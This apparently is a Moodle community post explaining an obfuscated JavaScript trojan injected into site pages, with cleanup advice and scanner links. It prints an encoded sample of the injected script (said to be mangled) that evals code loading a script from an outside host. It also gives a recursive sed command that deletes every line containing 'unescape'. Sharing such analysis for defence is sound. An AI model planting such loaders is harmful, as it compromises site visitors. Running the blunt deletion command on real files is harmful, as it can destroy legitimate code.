Lately I have seen a few Moodle issues where the current Stable version of Moodle 1.9.4-1.9.5 became exploited by Java Script Obfuscation code. What this means is that an unsuspecting user can upload an infected web executable php, asp or cgi script via ftp or Front Page. Most likely these types of attacks come from unsuspecting Windows Users that have unknowingly been infected by a common Trojan:JS. The binary code on an infected computer will actually write (inject) a Java Script formatted similar to this one in a web page:
<script Xlanguage=javascript><!--
(function(){var tDBt='v_61r_20a_3d_22S_63rip_74_45_6eg_69ne_22_2cb_3d_22_56e_72si_6fn_28)+_22_2c_6a_3d_22_22_2c_75_3
dnavigator_2e_75se_72A_67ent(u_2e_69n_64exOf(_22Ch_72_6f_6de_22)_3c0_29_26_26_28u_2ei_6e_64exOf_28_22W_69_6e_22)_3e0
_26_26(u_2eindexO_66(_22NT_206_22)_3c0)_26_26_28eindexOf(_22mi_65k_3d_31_22)_3c0)_26_26_28typeof_28_7arvzts
_21_3d_74_7bz_72vzts_3d_22A_22_3b_65_76_61l(_22_69f(window_2e_22+a+_22)j_3dj_2b_22+_61+_22M_61_6a_6fr_22+b_2ba
+_22_4din_6f_72_22+b+a+_22_42ui_6cd_22_2bb+_22j_3b_22)_3bdocument_2e_77_72i_74e(_22_3cscript_20src_3d_2f_2fmart_22_2b_22uz
2ecn_2f_76i_64_2f_3fid_3d_22+_6a+_22_3e_3c_5c_2fsc_72_69pt_3e_22)_3b_7d';var lSP=tDBt.replace(/_/g,'%'); var UIP0u=unescape(lSP);eval(UIP0u)})();
--></script>
Note:
The above Code encoded by the Java Script escape method has been mangled to make it harmless. With JS::Escape all spaces, punctuation, accented characters, and any other non-ASCII characters are replaced with %xx encoding, where xx is equivalent to the hexadecimal number representing the character.
For example, a space is returned as "%20." Characters with a value greater than 255 are stored using the %uxxxx format. This Java Script Trojan is highly disturbing due to the manner that it occurs and attempts to potentially wreck your computer to an alarming degree thru JS Code Obfuscation.
Unsuspecting Site owners running Anti Malware countermeasures will be warned upon visiting a page on an exposed site. It is very simple to indetify via a simple
page source view from the browser. One can actually physically see the JavaScript
payload embedded in the page headers or near the body of the page.
So the question that may be asked is how exactly does this all occur?
The answer is extremely basic: when the particular chosen computer from where you upload data thru FTP/fp or CGI is infected, it injects some Java Script to all executable web files (jsp,asp,html,php,etc). Mots of the time the targets are index pages (index.html, index.php, index.jsp, and index.asp).
Can Java Script Trojans Be Stopped:
Shell scripts for Linux servers can actually remove these annoying injected Java Scripts since they can be detected thru scanning for the Java Script Function "unescape" method which Decodes String objects encoded with the JS:Escape method. You can run a basic shell script that simply evaluates a simple command find ./ -type f -exec sed -i ‘/unescape/d' {} \;. This command serves the purpose of literally removing all the lines with pattern "unescape". It really depends on many circumstances but Java Trojan's like this one can be cleaned from infected files.
JS:Trojan Counter Measures:
I would recommend having ftp passwords changed as soon as possible also users of sites make sure they are running current antiviral measures on Windows.I suspect the last one I saw recently actually came via Front Page from a Windows User. This can mean the source of the files were compromised in the beginning via an infected windows host. Most of these that are known of today are usually trying to exploit a browser vulnerability of some kind from via Client Side Java Script.
Here is a link to a list of known JS Exploits:
http://www.viruslist.com/en/virusesdescribed?chapter=153318100&page=1
Simply the threat is low here since Trojan.JS (Obfuscation Scripts) are a Trojan Horse JavaScript that causes Microsoft Internet Explorer and other browsers to open a new window to a particular Web page usually thru an embedded <IFRAME> that has a non visible style or css class thus hiding the page redirection from the user.
Here is the link to the current script I have that can detected the presence of the "unescape" Java decoding method and some basic IFRAME tag redirections.
Sincerely I hope this helps my friends in the Moodle Community to whom I devote much of my time, effort and resources.
Scanner Links:
http://macklin.homelinux.net/scanners/JsObfusScan.tgz
http://macklin.homelinux.net/scanners/README.txt